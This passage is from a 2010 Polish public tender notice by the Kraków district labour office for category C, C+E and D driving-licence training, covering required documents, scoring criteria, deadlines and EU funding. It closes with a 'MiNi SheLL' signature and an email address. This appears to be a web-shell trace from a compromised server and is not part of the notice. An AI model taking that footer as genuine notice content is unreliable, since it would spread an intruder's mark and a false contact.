9.Pełnomocnictwo dla osoby podpisującej ofertę lub inny dokument, z którego wynikać będzie jej umocowanie do reprezentowania Wykonawcy w postępowaniach przetargowych, w tym podpisywania dokumentów przetargowych;
10.Formularz dotyczący podwykonawców z określeniem ich udziału w wykonywaniu zamówienia - załącznik nr 10 do SIWZ;
11.Preliminarz kosztów - załącznik nr 9a, 9b oraz 9c do SIWZ.
12.Informacja dotycząca lokalizacji, w której realizowane będą zajęcia wraz ze szczegółowym opisem wyposażenia sal dydaktycznych.
13.Certyfikat jakości usług potwierdzający wysoki standard świadczonych usług szkoleniowych (np. akredytacja kuratora oświaty, certyfikat systemu zarządzania jakością kształcenia/szkolenia wydany na podstawie międzynarodowych norm ISO, itp.), jeżeli Wykonawca takim dysponuje.
14.Wzór zaświadczenia o ukończeniu szkolenia dla osób ubiegających się o prawo jazdy kat. C, kat. C+E i kat. D oraz wzór certyfikatu, potwierdzone za zgodność z oryginałem przez uprawnionego przedstawiciela Wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - liczba przeprowadzonych szkoleń z zakresu prawa jazdy kategorii C, C+E oraz D w ciągu ostatnich trzech lat przed upływem terminu składania ofert w - 15</li>
<li>3 - liczba osób przeszkolonych z zakresu prawa jazdy kategorii C, C+E oraz D w ciągu ostatnich trzech lat przed upływem terminu składania ofert w postę - 15</li>
<li>4 - Posiadanie przez Wykonawcę certyfikatu jakości usług, który potwierdzałby wysoki standard świadczonych usług (oznaczonego skrótem Cj) - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy, ograniczenia zakresu przedmiotu zamówienia, w szczególności w przypadku powstania okoliczności powodujących, że wykonanie tego zakresu nie leży w interesie publicznym oraz okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uppk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro
tel. 12/623-74-80, fax 12/632-52-15, godziny otwarcia: pon. - pt. 7.30 - 15.30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2010 godzina 10:00, miejsce: URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro, stanowisko dziennika podawczego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT  WSPÓŁFINANSOWANY 
Z EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO
REALIZOWANY W RAMACH 
PODDZIAŁANIA 6.1.3
PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com